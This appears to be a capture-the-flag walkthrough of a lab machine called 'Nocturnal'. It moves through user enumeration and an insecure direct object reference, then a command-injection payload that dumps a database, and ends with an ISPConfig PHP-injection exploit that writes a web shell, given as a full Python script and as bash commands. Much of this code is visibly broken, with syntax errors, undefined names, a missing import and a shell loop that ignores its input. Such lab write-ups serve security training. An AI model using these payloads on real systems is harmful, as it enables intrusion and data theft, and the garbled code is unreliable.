# Nocturnal

# 1. Enumeration

Start by enumerating the open ports on this machine

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image.png)

Only two ports are open, one running SSH and other hosting a web application service. This web application is designed to upload office or PDF files  

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%201.png)

Register an account to inspect what actions could be executed as a normal user

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%202.png)

We also proceed to enumerate directories but nothing of interest was found

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%203.png)

Upload a file and capture the request using `Burpsuite` to inspect what it is going on 

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%204.png)

# 2. User flag

A normal `.pdf` file was uploaded

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%205.png)

The GET request used to access the uploaded file includes the username and the name file to locate the required file

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%206.png)

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%207.png)

However we can’t access files outside the user’s directory

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%208.png)

This is way to enumerate users, as the response returns different messages depending whether a user exists or not, `fuzz` the username parameter in this request

```python
wfuzz -u 'http://nocturnal.htb/view.php?username=FUZZ&file-doesnotexist.pdf' -H 'Cookie: cookie' -w wordlist --hh hidecharacters
```

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%209.png)

When we request a file for amanda, the web server displays a message disclosing user’s updated files. The backend does not validate the identity of the entity performing the request through the cookie. This allows us to access other users’ uploads and exfiltrate their information like the admin password

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2010.png)

Now we have access to the admin panel, here we can review the source code of the page, this could lead to a security breach by exposing direct vulnerabilities

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2011.png)

We can also create back ups of this page source

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2012.png)

In the login.php the database file is disclosed

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2013.png)

In `admin.php` we can see how the backup is generated, it is created by a command executed by `proc_open` funcion, the password field is not sanitized at all, it allows us to break out the normal command flow of the command using a `“` , enabling arbitrary command execution outside of the zip command. However we also need to consider the clean entry function which removes characters like `;`  - `&` -   ``etc.

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2014.png)

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2015.png)

Use the following payload to exfiltrate database information, to bypass clean entry function we will use `TAB` urlencoded

```python
"sqlite3%09../nocturnal_database/nocturnal_database.db%09.dump"
```

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2016.png)

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2017.png)

Crack the hashes found to gain access as tobias through SSH

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2018.png)

# 3.Priv esc

As `tobias` we can access to internal services that weren’t available before

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2019.png)

In `localhost:8080` there is a web application with a login form, let’s proceed to forward it

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2020.png)

`IPSCONFIG` is a control panel for linux servers, access it using the credentials obtained previously

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2021.png)

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2022.png)

While checking around, specifically in monitor section, an error is displayed revealing the current version of the software

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2023.png)

Search on internet for vulnerabilities related with this version

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2024.png)

If the admin can edit language it means we will have access as root in the machine

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2025.png)

Use the following script to exploit this vulnerability and spawn a shell with elevated privileges

```python
import requests
import sys
import base64
import string
import random

def ensure_url_format(url):
	if not url.startswith(("http://","https://")):
		raise ValueError("Url must start with http:// or https://")
	if no url.endswith("/"):
		url += "/"
	
	return url
	
def login(url, user, password, session):
	
	login_url = f"{url}login/"
	data = {
		'username':user,
		'password':password,
		's_mod':'login'
	}
	
	resp = session.post(login_url, data=data, verify=False)
	if 'Usename or password wrong' in resp.text:
		sys.exit('Login failed!!')
	print("[*] Login successful!")

def get_csrf_tokens(url, session, lang_file):
	print('[*] Fetching CSRF tokens..')
	target_url = f"{url}admin/language_edit.php"
	data = {
		'lang':'en',
		'module':'help',
		'lang_file':lang_file
	}
	resp = session.post(target_url, data=data, verify=False)
	
	csrf_id_match = re.search(r'_csrf_id" value="([^"]+)"', resp.text)
	csrf_key_match = re.search(r'_csrf_key" value="([^"])+)"', resp.text)
	
	if not csrf_id_match or not csrf_key_match:
		sys.exit("[-] CSRF tokens not found!")
	
  print(f"[+] CSRF ID: {csrf_id_match.group(1)}")
  print(f"[+] CSRF Key: {csrf_key_match.group(1)}")
  return csrf_id_match.group(1), csrf_key_match.group(1)
  

def inject_shell(url, session, lang_file, csrf_id, csrf_key):
	
	payload = base64.b64encode(b"<?php print('___'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('___';) ?>").decode()  
	injection = f"'];file_put_contents('sh.php',base64_decode('{payload}'));die;#"
	
	data = {
        'lang': 'en',
        'module': 'help',
        'lang_file': lang_file,
        '_csrf_id': csrf_id,
        '_csrf_key': csrf_key,
        'records[\\]': injection
    }
		resp = session.post(f"{url}admin/language_edit.php", data=data, verify=False)

    if resp.status_code == 200:
        print(f"[+] Shell written to: {url}admin/sh.php")
    else:
        print(f"[-] Failed to send payload, HTTP {resp.status_code}")
        
 def launch_shell(url, session):
	 print("[+] Lauching shell...")
	 shell_url = f"{url}admin/sh.php"
	 
	 while True:
		 try:
			 cmd = input("\nispconfig-shell@#")
			 if cmd.strip().lower() == "exit":
				 break
			 
			 headers = {'C': base64.b64encode(cmd.encode()).decode()}
			 resp = session.get(shell_url, headers=headers, verify=False)
			 output = re.search(r'___(.*)___', resp.text, re.DOTALL)
						 
			 if output:
			         print(output.group(1).strip())
			     else:
			         print("[-] Exploit failed or no output.")
	 	except KeyboardInterrupt:
		  break   

if __name__ == "__main__":
	if len(sys.argv) != 4:
		sys.exit(f"\nUsage: python {sys.argv[0]} <url> <Username> <passowrd>\n")
		
	url, user, password = sys.argv[1], sys.argv[2], sys.argv[3]
	
	#Disable SSL warnings
	requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
	
	url = ensure_url_format(url)
	session = requests.Session()
	session = login(nice_url, user, password, session)
	
	lang_file = ''.join(random.choices(string.ascii_lowercase,k=8)) + '.lng'
	csrf_id, csrf_key = get_csrf_tokens(url, session, lang_file)
	inject_shell(url,session, lang_file, csrf_id, csrf_key)
	launch_shell(url,session)
```

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2026.png)

We can also exploit this php injection manually. First we need to retrieve `CSRF` validation tokens by  simulating an edit of a random `lang_file` 

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2027.png)

The next step is to prepare our payload, we will use variables for a better understanding of each part of the injection

```bash
SHELL_NAME="rev.php"
#Take the content of the C header and execute it as system
PHP_PAYLOAD="<?php echo '___'; system(base64_decode(\$_SERVER['HTTP_C'])); echo '___'; ?>"
#Base 64 enconde the payload
ENCODED=$(echo -n "$PHP_PAYLOAD"| base64 -w0)
#Upload the file that is expecting the malicious header to then execute it
INJECT="']file_put_contents('$SHELL_NAME',base64_decode('$ENCODED'));die;#"
#Encode the injection to support url formating -s oneline -R raw -r plaintext @uri=urlencode
ENCODED_INJECT=$(prinf '%s' "$INJECT" | jq -s -R -r @uri)
```

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/image%2028.png)

Now, we can inject the payload in the vulnerable `records[\]` POST parameter

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/33a2d5ab-d502-4b18-aac1-d72cf4c07bca.png)

The file is uploaded successfully, we can execute code sending requests to out malicious injection (`rev.php`) passing commands in `C` header 

```bash
ENCODED=$(echo -n "id" | base64 -w0)
RESP=%(curl -sk -H "C: $ENCODED" "http://127.0.0.1:8000/admin/rev.php")
echo $RESP
```

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/f78240ef-fa79-477c-9fe3-07e1a660b7a3.png)

Or automating a shell in bash

```bash
while true; do
	echo -en "ispconfig-shell# "
	read -r CMD || continue
	[[ "$CMD" == "exit" ]] && break
	
	ENCODED=$(echo -n "id" | base64 -w0)
	RESP=%(curl -sk -H "C: $ENCODED" "http://127.0.0.1:8000/admin/rev.php")
	
	PAYLOAD=$(echo "$RESP" | grep -ozP '(?<=___)(.|\n)*?(?=___)' | tr -d '\0')
	if [[ -n "$PAYLOAD"]]; do
		echo "$PAYLOAD"
	else
		echo "[!] No output detected"
	fi
	
	echo ""
done
	
```

![image.png](Nocturnal%20218b95255291803bb679d1028fdaa809/40fd6f42-d0fd-4b10-acc6-4abcccb0a23b.png)

Machine pwned@!@!#